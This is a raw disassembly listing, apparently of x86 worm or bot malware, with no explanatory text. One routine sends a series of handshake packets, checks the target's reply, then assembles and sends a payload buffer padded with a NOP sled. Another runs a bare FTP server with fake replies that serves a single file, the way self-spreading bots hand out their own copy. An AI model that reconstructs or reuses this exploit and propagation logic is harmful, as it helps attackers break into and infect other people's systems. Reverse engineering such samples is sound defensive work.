loc_410BAF: ; CODE XREF: .text:00410BA8�j
push 89h
push offset dword_41AF50
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp-80Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410BEF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BEF: ; CODE XREF: .text:00410BE8�j
push 0A8h
push offset dword_41AFDC
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp-80Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C2F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C2F: ; CODE XREF: .text:00410C28�j
push 0DEh
push offset dword_41B088
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp-80Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C6F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C6F: ; CODE XREF: .text:00410C68�j
movsx eax, byte ptr [ebp-7CCh]
sub eax, 30h
mov [ebp-208h], al
movsx eax, byte ptr [ebp-7C8h]
sub eax, 30h
mov [ebp-4], al
push 3Eh
push offset dword_41B168
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp-80Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410CC9
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410CC9: ; CODE XREF: .text:00410CC2�j
push 60h
push offset dword_41B1A8
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp-80Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D06
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D06: ; CODE XREF: .text:00410CFF�j
push 0A0h
push offset dword_41B20C
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp-80Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D46
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D46: ; CODE XREF: .text:00410D3F�j
movsx eax, byte ptr [ebp-208h]
cmp eax, 5
jnz loc_410E71
movsx eax, byte ptr [ebp-4]
cmp eax, 1
jnz loc_410E71
push 86h
push offset dword_41B2B0
lea eax, [ebp-0B78h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp-20Ch]
lea eax, [ebp-204h]
push eax
lea eax, [ebp-0AF2h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0
mov eax, 264h
sub eax, [ebp-20Ch]
add eax, 60h
push eax
mov eax, [ebp-20Ch]
lea eax, [ebp+eax-0AF2h]
push eax
call sub_410F60
add esp, 0Ch
push 4
push offset dword_41B410
lea eax, [ebp-88Eh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp-882h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp-85Eh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp-852h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 20h
push offset dword_41B338
lea eax, [ebp-82Eh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 36Ah
lea eax, [ebp-0B78h]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 400h
call ds:dword_41709C ; Sleep
push 36Ah
lea eax, [ebp-0B78h]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410E71: ; CODE XREF: .text:00410D50�j
; .text:00410D5D�j
movsx eax, byte ptr [ebp-208h]
cmp eax, 5
jnz short loc_410E85
movsx eax, byte ptr [ebp-4]
test eax, eax
jz short loc_410E95
loc_410E85: ; CODE XREF: .text:00410E7B�j
movsx eax, byte ptr [ebp-208h]
cmp eax, 4
jnz locret_410F5E
loc_410E95: ; CODE XREF: .text:00410E83�j
push 86h
push offset dword_41B35C
lea eax, [ebp-104Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E8h
sub eax, [ebp-20Ch]
push eax
push 90h
lea eax, [ebp-0FC6h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push dword ptr [ebp-20Ch]
lea eax, [ebp-204h]
push eax
lea eax, [ebp-0BDEh]
sub eax, [ebp-20Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
and dword ptr [ebp-0B7Ch], 0
jmp short loc_410F06
; ---------------------------------------------------------------------------
loc_410EF9: ; CODE XREF: .text:00410F2C�j
mov eax, [ebp-0B7Ch]
inc eax
mov [ebp-0B7Ch], eax
loc_410F06: ; CODE XREF: .text:00410EF7�j
cmp dword ptr [ebp-0B7Ch], 10h
jge short loc_410F2E
push 4
push offset dword_41B408
mov eax, [ebp-0B7Ch]
lea eax, [ebp+eax*4-0BDEh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_410EF9
; ---------------------------------------------------------------------------
loc_410F2E: ; CODE XREF: .text:00410F0D�j
push 20h
push offset dword_41B3E4
lea eax, [ebp-0B9Eh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4CEh
lea eax, [ebp-104Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
locret_410F5E: ; CODE XREF: .text:00410BAA�j
; .text:00410BEA�j ...
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F60 proc near ; CODE XREF: .text:00410DB7�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_8], 0
jnz short loc_410FA4
and [ebp+var_4], 0
jmp short loc_410F79
; ---------------------------------------------------------------------------
loc_410F72: ; CODE XREF: sub_410F60+3D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410F79: ; CODE XREF: sub_410F60+10�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_410F9F
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov al, byte_41BB00[eax]
mov [ecx], al
jmp short loc_410F72
; ---------------------------------------------------------------------------
loc_410F9F: ; CODE XREF: sub_410F60+1F�j
jmp locret_41102D
; ---------------------------------------------------------------------------
loc_410FA4: ; CODE XREF: sub_410F60+A�j
cmp [ebp+arg_8], 7Fh
jnz short loc_410FDF
and [ebp+var_8], 0
jmp short loc_410FB7
; ---------------------------------------------------------------------------
loc_410FB0: ; CODE XREF: sub_410F60+7B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_410FB7: ; CODE XREF: sub_410F60+4E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jnb short loc_410FDD
push 5
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov al, byte_41BB00[eax]
mov [ecx], al
jmp short loc_410FB0
; ---------------------------------------------------------------------------
loc_410FDD: ; CODE XREF: sub_410F60+5D�j
jmp short locret_41102D
; ---------------------------------------------------------------------------
loc_410FDF: ; CODE XREF: sub_410F60+48�j
and [ebp+var_C], 0
loc_410FE3: ; CODE XREF: sub_410F60+AD�j
; sub_410F60+CB�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnb short locret_41102D
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_10], al
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_8]
and ecx, dword_41BB01[eax]
test ecx, ecx
jz short loc_41100F
jmp short loc_410FE3
; ---------------------------------------------------------------------------
loc_41100F: ; CODE XREF: sub_410F60+AB�j
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_C]
mov al, byte_41BB00[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_410FE3
; ---------------------------------------------------------------------------
locret_41102D: ; CODE XREF: sub_410F60:loc_410F9F�j
; sub_410F60:loc_410FDD�j ...
leave
retn
sub_410F60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41102F proc near ; CODE XREF: sub_41113B+79B�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 210h
push 0EA60h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4050EA
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411065
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_41106C
loc_411065: ; CODE XREF: sub_41102F+2B�j
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41106C: ; CODE XREF: sub_41102F+34�j
push offset aRb ; "rb"
push offset dword_41EB2C
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_41109F
push [ebp+var_204]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41109F: ; CODE XREF: sub_41102F+5B�j
; sub_41102F:loc_41111C�j
mov eax, [ebp+var_208]
mov eax, [eax+0Ch]
and eax, 10h
test eax, eax
jnz short loc_41111E
push [ebp+var_208]
push 200h
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_20C], eax
push [ebp+var_20C]
lea eax, [ebp+var_200]
push eax
push [ebp+var_204]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_210], eax
mov eax, [ebp+var_20C]
cmp eax, [ebp+var_210]
jz short loc_41111C
push [ebp+var_204]
call sub_4053B1
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
xor eax, eax
jmp short locret_411139
; ---------------------------------------------------------------------------
loc_41111C: ; CODE XREF: sub_41102F+CF�j
jmp short loc_41109F
; ---------------------------------------------------------------------------
loc_41111E: ; CODE XREF: sub_41102F+7E�j
push [ebp+var_204]
call sub_40538D
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
locret_411139: ; CODE XREF: sub_41102F+38�j
; sub_41102F+6B�j ...
leave
retn
sub_41102F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41113B proc near ; DATA XREF: sub_411BBC+156�o
var_558 = dword ptr -558h
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_544 = dword ptr -544h
var_540 = byte ptr -540h
var_53C = byte ptr -53Ch
var_538 = byte ptr -538h
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_52C = dword ptr -52Ch
var_528 = dword ptr -528h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_318 = byte ptr -318h
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 558h
push edi
mov eax, [ebp+arg_0]
mov [ebp+var_10C], eax
push offset dword_41C6B0
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
mov al, byte_41DE30
mov [ebp+var_104], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
mov al, byte_41DE30
mov [ebp+var_114], al
xor eax, eax
lea edi, [ebp+var_113]
stosd
stosb
and [ebp+var_4], 0
and [ebp+var_118], 0
and [ebp+var_108], 0
loc_4111CC: ; CODE XREF: sub_41113B+10C�j
; sub_41113B+1BD�j ...
push 0EA60h
push [ebp+var_10C]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jz loc_4119BA
push 200h
lea eax, [ebp+var_318]
push eax
push [ebp+var_10C]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_520], eax
cmp [ebp+var_520], 0
jz short loc_411218
cmp [ebp+var_520], 0FFFFFFFFh
jnz short loc_41121D
loc_411218: ; CODE XREF: sub_41113B+D2�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41121D: ; CODE XREF: sub_41113B+DB�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
lea eax, [ebp+var_318]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_528], eax
cmp [ebp+var_528], 0
jnz short loc_411249
jmp short loc_4111CC
; ---------------------------------------------------------------------------
loc_411249: ; CODE XREF: sub_41113B+10A�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_51C], eax
cmp [ebp+var_51C], 0
jnz short loc_411278
mov [ebp+var_51C], offset byte_41DE30
loc_411278: ; CODE XREF: sub_41113B+131�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
push [ebp+var_528]
call sub_40ED38
pop ecx
mov [ebp+var_524], eax
mov eax, [ebp+var_524]
sub eax, dword_41C6A0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4112FD
mov [ebp+var_4], 1
push offset dword_41C698
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4112FD: ; CODE XREF: sub_41113B+178�j
mov eax, [ebp+var_524]
sub eax, dword_41C68C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41135D
mov [ebp+var_118], 1
push offset dword_41C684
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41135D: ; CODE XREF: sub_41113B+1D5�j
cmp [ebp+var_4], 0
jz short loc_41136C
cmp [ebp+var_118], 0
jnz short loc_411371
loc_41136C: ; CODE XREF: sub_41113B+226�j
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411371: ; CODE XREF: sub_41113B+22F�j
mov eax, [ebp+var_524]
sub eax, dword_41C678
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4113C7
push offset dword_41C670
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4113C7: ; CODE XREF: sub_41113B+249�j
mov eax, [ebp+var_524]
sub eax, dword_41C664
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41141D
push offset dword_41C65C
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41141D: ; CODE XREF: sub_41113B+29F�j
mov eax, [ebp+var_524]
sub eax, dword_41C654
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_411473
push offset dword_41C648
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411473: ; CODE XREF: sub_41113B+2F5�j
mov eax, [ebp+var_524]
sub eax, dword_41C63C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4114C9
push offset dword_41C634
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4114C9: ; CODE XREF: sub_41113B+34B�j
mov eax, [ebp+var_524]
sub eax, dword_41C628
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41151F
push offset dword_41C620
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41151F: ; CODE XREF: sub_41113B+3A1�j
mov eax, [ebp+var_524]
sub eax, dword_41C614
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411622
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_52C]
push eax
lea eax, [ebp+var_540]
push eax
lea eax, [ebp+var_53C]
push eax
lea eax, [ebp+var_538]
push eax
lea eax, [ebp+var_530]
push eax
push offset aUUUUUU ; "%u,%u,%u,%u,%u,%u"
push [ebp+var_51C]
call sub_416BA2 ; sscanf
add esp, 20h
movzx eax, [ebp+var_540]
push eax
movzx eax, [ebp+var_53C]
push eax
movzx eax, [ebp+var_538]
push eax
movzx eax, [ebp+var_530]
push eax
push offset dword_418A50
push 100h
lea eax, [ebp+var_104]
push eax
call sub_416BAE ; _snprintf
add esp, 1Ch
mov eax, [ebp+var_52C]
and eax, 0FFh
shl eax, 8
mov ecx, [ebp+var_534]
and ecx, 0FFh
or eax, ecx
push eax
push offset dword_418A60
push 6
lea eax, [ebp+var_114]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41C634
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411622: ; CODE XREF: sub_41113B+3F7�j
mov eax, [ebp+var_524]
sub eax, dword_41C5F4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_4116E9
push offset aRb ; "rb"
push offset dword_41EB2C
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_548], eax
cmp [ebp+var_548], 0
jnz short loc_411660
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411660: ; CODE XREF: sub_41113B+51E�j
push 2
push 0
push [ebp+var_548]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_548]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_544], eax
push 0
push 0
push [ebp+var_548]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_548]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_544]
push offset dword_41C5E8
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4116E9: ; CODE XREF: sub_41113B+4FA�j
mov eax, [ebp+var_524]
sub eax, dword_41C5DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411873
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_104]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_54C], eax
cmp [ebp+var_54C], 0
jz short loc_411773
cmp [ebp+var_54C], 0FFFFFFFFh
jnz short loc_411778
loc_411773: ; CODE XREF: sub_41113B+62D�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411778: ; CODE XREF: sub_41113B+636�j
push offset aRb ; "rb"
push offset dword_41EB2C
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_554], eax
cmp [ebp+var_554], 0
jnz short loc_41179D
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41179D: ; CODE XREF: sub_41113B+65B�j
push 2
push 0
push [ebp+var_554]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_554]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_550], eax
push 0
push 0
push [ebp+var_554]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_554]
call sub_416B82 ; fclose
pop ecx
push offset dword_41EB2C
push [ebp+var_550]
push offset aX32000Fh1024Ja ; "-x 3 2000 fh 1024 Jan 1 0:00 .\r\ndrwxr-x"...
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_54C]
call sub_4053BF
add esp, 0Ch
push [ebp+var_54C]
call sub_40538D
pop ecx
push offset dword_41C558
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411873: ; CODE XREF: sub_41113B+5C1�j
mov eax, [ebp+var_524]
sub eax, dword_41C54C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411969
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_104]
push eax
call sub_41102F
pop ecx
pop ecx
test eax, eax
jz loc_411967
push offset dword_41C558
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push 1
push offset dword_41EB08
call sub_409C88
pop ecx
pop ecx
inc eax
mov [ebp+var_558], eax
lea eax, [ebp+var_104]
push eax
push [ebp+var_558]
push offset aFtp_0 ; "ftp"
push offset unk_41C520
push offset dword_41DAB4
call sub_40D4AB
add esp, 14h
push 3E8h
call ds:dword_41709C ; Sleep
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411967: ; CODE XREF: sub_41113B+7A4�j
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411969: ; CODE XREF: sub_41113B+74B�j
mov eax, [ebp+var_524]
sub eax, dword_41C514
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4119BA
push offset a221 ; "221 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
loc_4119BA: ; CODE XREF: sub_41113B+A5�j
; sub_41113B:loc_411218�j ...
push offset a231 ; "231 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push [ebp+var_10C]
call sub_40538D
pop ecx
xor eax, eax
pop edi
leave
retn 4
sub_41113B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A09 proc near ; CODE XREF: sub_411BBC+90�p
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 204h
push 32h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_411A29
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A29: ; CODE XREF: sub_411A09+17�j
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411A58
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411A5F
loc_411A58: ; CODE XREF: sub_411A09+44�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A5F: ; CODE XREF: sub_411A09+4D�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6D8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411A8A
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A8A: ; CODE XREF: sub_411A09+78�j
push offset dword_41C6CC
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411AEE
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411AF5
loc_411AEE: ; CODE XREF: sub_411A09+DA�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411AF5: ; CODE XREF: sub_411A09+E3�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6C8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411B20
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411B20: ; CODE XREF: sub_411A09+10E�j
call sub_410422
push eax
push offset dword_41C6BC
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411B8B
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411B8F
loc_411B8B: ; CODE XREF: sub_411A09+177�j
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411B8F: ; CODE XREF: sub_411A09+180�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6B8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411BB7
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411BB7: ; CODE XREF: sub_411A09+1A8�j
push 1
pop eax
locret_411BBA: ; CODE XREF: sub_411A09+1B�j
; sub_411A09+51�j ...
leave
retn
sub_411A09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
